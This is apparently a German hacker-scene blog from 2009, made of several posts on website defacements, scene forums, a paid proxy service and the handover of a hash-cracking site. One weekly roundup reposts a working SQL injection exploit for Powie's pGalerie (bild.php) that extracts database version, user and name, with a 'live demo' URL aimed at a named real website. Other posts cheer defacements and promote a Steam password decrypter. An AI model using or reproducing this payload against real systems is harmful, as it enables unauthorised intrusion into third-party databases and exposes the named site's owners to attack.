Blood and Honour International Neo-Nazi network hacked

Mal wieder wurde das bekannte Neo-Nazi Forum “Blood and Honour” gehackt bzw. defaced.

Mehr dazu und auch teils Ausschnitte aus Privaten Nachrichten:

http://wikileaks.de/wiki/Blood_and_Honour_international_Neo-Nazi_network_messages_and_passwords,_Mar_2009

Meine Meinung dazu:

Ich find das eigentlich in Ordnung. Es wird zwar nicht sehr viel bringen, aber allgemein betrachtet, wenn man in den Nachrichten aktuell sieht, was die NPD teilweise fuer Aktionen startet und Ziele haben, find ich aufjedenfall nicht in Ordnung.

Auf gulli.com gibts nen netten Artikel bezueglich solche Defaces:

Warum Nazi-Seiten hacken eine Gute Sache ist

Dürfen die das? “…ja, das dürfen die…”

Mehr dazu: http://www.gulli.com/netzwelt/fight-back/naziseiten-defacen/

Die zweite Seite, welche auch vor kurzem “gehackt” wurde, war NFOs.de – auch diese wurden von anderen defaced und x release eintraege durchgefuehrt, mit teilweise Drohungen gegen anderen NFO Seiten.

Die bekannte NFO-Source Seite “German NFO Source” wurde heute Opfer einen Hackangriffes. Die oder der Hacker – die Scene Watchdogs – haben alle Release-Einträge in der Datenbank in “Second.Warning.From.The.Scene.Close.Down.This.Sit e.Or.You.Will.Burn.Same.Goes.for.nfobase.and.xrel-NOTKIDDING 35571″ umgeändert und als Release-Info “By.Scene.Watchdosgs – Fuck You All”.

Mehr dazu: http://newsbox.cc/allgemein/nfosde-gehackt-das-ist-aber-nicht-alles/

Meine Meinung dazu:

Passiert. Jedoch find ich das sinnlos, dass nun einer auf “l33t hacker” mit Drohungen an andere Seiten machen musste. DDL-Warez.org hatte es ja uebrigens auch getroffen.. aber naja ich such mir meine lieblings NFO Page ist und bleibt eh xREL – dann bin ich mal gespannt, ob er die Drohungen war machen laesst 😉 Denke aber eher, da wird nichts kommen..

Wochenuebersicht

Nabend,

heute stell ich euch wieder ne kleine Wochenuebersicht vor, bzw. auch News zu meinem Blog.

Punkt 1: Demnaechst werd ich denk ich nen anderes Design nehmen, da mich dieses etwas “stresst”.

Punkt 2: Warum konnte ich in letzter Zeit nicht viel bloggen? – Joa wie das Problem von vielen, eben der Zeitmangel. Hatte heute bzw. gestern erst wieder eine Mathe Arbeit, am Donnerstag folgt Englisch, naechste Woche am Montag Geschichte und am Freitag meine theoretische Fahrpruefung fuer den Fuehrerschein.

Werd also spaetestens dieses WE wieder was posten koennen. Werd daher dise Wochenuebersicht kurz halten und teils Themen dranbringen die alt sind.

Punkt 3:

Wie schon hier zu sehen, hatte ich ja mal das “DarkMatrix” Forum erwaehnt: http://j0hnx3r.org/?p=195 wie schlecht es doch ist usw.. am 15.03.2009 wurde es dann nun defaced (wundert mich nicht), wer es sich anschauen moechte: http://j0hnx3r.org/defaced/darkmatrix/ wenn ich mir denen ihren banner anschau.. 😀 Herrlich, “Hacker Stuff” drunter Pics von Rapidshare, Poison Ivy & Bifrost 😀 Najo so gibts auch immer wieder was zu lachen 😉

Punkt 4:

-tmh- hat nen neues Exploit veroeffentlicht, zumindest auf seinem Blog:

########################################################################################################################
#Powie's pGalerie 1.0 (bild.php) Remote SQL Injection Exploit
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://www.powie.de
#
#=======================================================================================================================
#
#
#Exploit :
#--------------------------------
#
#www.[URL]/[PATH]/bild.php?id='+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13/*
#
#Live demo :
#--------------------------------
#
#http://www.fortuna-griesheim.de/mod/galerie/bild.php?id='+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13/*
#
#=======================================================================================================================
#Discovered by : -tmh-
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to :n00bor , Five-Three-Nine , J0hn.X3r , electron1x , PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

Danke fuer die Greetz nochmal 🙂

Punkt 5:

Ich hab auf 539 seinem Blog (http://five-three-nine.org) einen Steam PW Decrypter Source fuer C Einsteiger/Anfaenger gesehen, welchen ich nuetzlich finde (bin zwar kein C Coder, aber bin mir sicher das wird dem ein oder anderen helfen) und ahjo mehr dazu hier: http://five-three-nine.org/blog/469/steam-pass-decrypter

Mein 6ter und vorerst letzter Punkt ist, dass am Freitag den 27.03.2009 normalerweise in Stuttgart die ESL Intel Friday Night stattgefunden haette/waere, jedoch nicht stattfinden wird, wie man hier nachlesen kann. Find ich nicht in Ordnung. Klar, einerseits kann ich die Leute verstehen, aber andererseits bringt das kein bisschen etwas.

Das ist wie diese Aktion mit Galeria Kaufhof oder so, welche “Killerspiele” aus dem Sortiment genommen haben. Meine Meinung dazu:
Wer kauf Killerspiele bei Galeria Kaufhof? Keine Sau. Daher haben die es auch nicht als Verlust gesehen und es einfach ausn Sortiment genommen und bei der Presse einen auf Helden gemacht.

Naja ich waere trotzdem gerne zu Intel Friday Night Event gegangen…

Ahjo noch 3 kleinigkeiten:
– Hab den Internet Explorer 8 auf meinem Vista PC installiert, da denkt man da klappt alles und nun ist meine Sidebar futsch.. muss das mal beheben irgendwann wenn ich Zeit hab.

– Hab mir ne neue Maus gekauft, ROCCAT Krone, sieht echt nice aus und ist gut 🙂 Empfehlenswert! 😀

– Nvidia hat neuen Grafikkarten Treiber raus: “Nvidia GeForce-Treiber 182.46 Beta für Vista und XP” *klick*

So das wars nun erstmal soweit von mir, nun ist es 1 Uhr und ich muss frueh aufstehen, ahja am WE folgt vllt nen kleines LFI Tut ueber eine andere Methode als die letzte 😉

SceneProxy.org Erfahrungsbericht

Heyho,

wie einige vllt schon mitbekommen haben, hatte ich ja damals schon einen kleinen Bericht zu SceneProxy.org verfasst (*klick*) und habe nun ziemlich genau am 1.3.2009 mir dort einen Proxy geholt.

Wie laeuft das ganze nun ab?

Das ist ein nettes System, man geht unter Produkte auf den Artikel “Privater Account” (10 Euro/Monat), klickt auf Bestellen und wird auf einen LiveChat weitergeleitet. Dort gewuenschten Username & eMail rein. Danach im LiveChat muss man nur wenige Sekunden warten und man bekommt einen Mitarbeiter zugeteilt. Sobald man ihm dann gesagt hat, man moechte nen Socks5 und zahlt per PSC, prueft der Mitarbeiter den Code und nach wenigen Minuten bekommt man seinen Proxy, schnell und einfach 🙂 Der Preis geht auch in Ordnung, die Einrichtung ist sehr einfach und der Support ist freundlich. Meiner Meinung nach ein wirklich empfehlenswerter Proxy Anbieter, welchen ich auch einigen weiterempfehlen moechte 🙂

Das war meine Meinung zu SceneProxy.org und morgen werde ich euch Alternativen zeigen, was man mit einem PW Hash machen kann, wenn man nicht unbedingt Rainbow Tables haben moechte 😉 Werd einige tools testen und vorstellen, und euch zeigen welche bei mir “am schnellsten” waren 🙂

Hashkiller.com sucht neuen Webmaster

Hallo Forum,

es fällt mir schwer diese Nachricht kund zu tun aber irgendwann musste es einfach soweit sein. Ich versuche es knapp zu formulieren.

Da sich alles mit der Zeit verändert kann sich auch mein Privatleben dem nicht entziehen. In den nächsten paar Monaten wird sich meine Lebenssituation stark ändern. Mein Virtuelles Leben wird dadurch betroffen sein dass ich kaum noch Freizeit für Projekte wie dieses haben werde. Dazu kommt dass sich meine finanzielle Lage es nicht mehr erlauben wird die Server und den Heimrechner mit dem Hashdir laufen zu lassen. Auf lange Sicht wird es also daraus hinauslaufen dass ich absolut keine Zeit mehr für Hashkiller.com haben werde. In den letzten paar Monaten habe ich es schon kaum geschafft die Ideen auf meiner Liste umzusetzten da einfach keine Zeit dafür da war. Was ich nicht möchte ist dass dieses Projekt und die Seite eine langsames Ende im Vergessen findet.

Daher habe ich mich entschlossen dieses Projekt gegen Ende des Monats (März) einem neuen Webmaster zu übergeben. Damit dieser auch fähig und daran interessiert ist dieses Projekt weiterzuführen würde ich eine Art “Schutzgebühr” von 100€ verlangen. Wer Interesse an dem Angebot hat sendet bitte ein Bewerbung an x13 {at} hashkiller.com. Es sollte in der Bewerbung stehen was man für Mittel (Server, Space, etc) und Fähigkeiten (Coden, Administrieren) hat, was man für Plane mit hashkiller.com hat, auch Referenzen sind gern gesehen. Spaßbewerbungen und welche ohne Niveau werden kommentarlos gelöscht. Es werden _nur_ Bewerbungen per Email angenommen. Für den Fall das sich keiner findet würde die Seite wohl alsbald verschwinden wie ich den Server nicht mehr bezahlen kann.

Dem neuen Webmaster würde ich die kompletten Scripte und Sourcecodes abtreten. Dies umfasst etwa 3500 Zeilen PHP5 Klassen wie unter anderem auch das Webcrack, OpenCrack und andere Hilfsklassen sowie Scriptteile. Dazu die Integration in dieses SMF Forumsystem mit Forum Datenbank. Was ausdrücklich nicht vergeben wird ist die 125GB große Hauptdatenbank sowie die Hashdir-Daten, diese sind einfach zu groß als dass man sie transferieren könnte. Jedoch gehören die Downloads und auf Wunsch auch die Rainbowtables im Mirrorsystem dazu. Die Domain die bis Juni 09 läuft inkl. DNS Zugang natürlich auch.

Es fällt mir wirklich schwer diesen Schritt zu gehen aber lieber so als einfach abschalten. Dieses Projekt hat mich seit etwa 5 Jahren begleitet, die ersten beiden noch mit ath.cx Domain und den Rest der Zeit unter hashkiller.com Ich habe viel Zeit investiert und auch manche Rückschläge hinnehmen müssen aber immer mehr gelernt als ich erhofft habe. Ich bin froh dass sich solch tolle Leute in dieser Community zusammengefunden haben die zusammen echt großes bewegen können.

Quelle & Mehr dazu: http://hashkiller.com/index.php?topic=719.msg4197

Dann hoff ich mal, dass sich jemand finden laesst und dem “alten” Admin alles Gute & viel Glueck im RL 🙂

Wochenuebersicht

Heyho,

heute werd ich euch meine zweite Wochenuebersicht zeigen, diesmal etwas anders gestaltet als damals. Ich werd das ganze in TOP & Flop aufteilen und paar Foren / Websiten vorstellen und dazu eine kleine Meinung sagen.

Top:

Kartoffel-hack.com home of Kartoffel-Hack & -tmh- hat gestern die 7000 (7. 016) Besucher am Tag Marke geknackt 🙂 Glueckwunsch von mir aus und auf die naechsten 7000! 😀

Coderz.ws ist online, sieht dort alles freundlich und gut aus, endlich mal wieder nen COding Board 🙂 Das Board steht unter der Leitung von Unbekannt.exe und PAN. Wuensch eurem Projekt alles Gute und das es natuerlich moeglichst lange haelt.

Hackbase.cc versucht schon seit laengerer Zeit die V2 durchzubringen und laesst sich trotz DDoS nicht runterkriegen. Find ich gut, daher ein + von mir 🙂

Sys-Flaw ist 1 Jahr alt geworden und hat inear Sys-Flaw 1 rausgebracht. Mehr dazu auf *klick*

Nazrek hat sein Lockpicking Grundlagen Exkurs 2 und den “Magic Data Extractor” (ein hilfreiches Tool fuer/bei SQL Injections) wurden auf seinem Blog released. Sieht beides super aus, daher von mir auch bei Top dabei.

NovuSec ein Projekt von Lidloses_Auge und -=Player=- hat auch einige neue, vorallem Interessante Eintraege ueber Web Security im Blog und auch 2 neue Videos bei milw0rm.com veroeffentlicht.

Flop:

MbK-Hacking wieder da? Oder doch nicht. Zuerst ging eine Massenmail durch “wir sind zurueck usw..” doch keiner kaum aufs Forum drauf?! Daraufhin stand dort, erneute Wartungsarbeiten und nun komm ich dort auf eine andere Seite…

DarkMatrix kannte ich bis vor 1h nicht. 50 registrierte Benutzer, und schon steht im Header “DarkMatrix – Scene Board No. 1” – alles klar.. Wird in meinen Augen nichts, auch ein Flop…

Code-C4 nutzt als CMS Webspell.. Hallo? Webspell? Keine Gute Wahl in meinen Augen. Wenn man sich die News anschaut, scheint denen die Rechtschreibung nicht sehr zu liegen. Nen Keylogger + FTP Funktion fuer 5 Euro? Find ich bisschen teuer, das sich jeder so nen Keylogger auch selber basteln kann, man findet dazu im Internet genug Codeschnippsel.

BZÖ Homepage wurde gehackt. Und der Verdacht geht mal wieder auf eine “Linke Webterroristen”.. die sollten sich mal ueberlegen, dass nicht nur die Linken gegen so eine Partei ist..

SwissVPN schlechter Support?! Ich hatte mal vor, mir dort einen Account zu beschaffen, per Kreditkarte gezahlt und nach 6h war mein Account gesperrt. Daraufhin “wtf?!” und Support angeschrieben.. keine Antwort. Dann mal ueber Paypal probiert, auch hier ging der Account nur wenige Minuten lang und wurde danach gesperrt. Das Geld haben sie natuerlich behalten.. das wird ein Nachspiel geben und ist in meinen Augen FLOP des Monats.

Das war meine kleine Wochenuebersicht, vllt nicht arg interessant aber so konnte ich meine Meinung zu einzelnen Seiten mal sagen. 🙂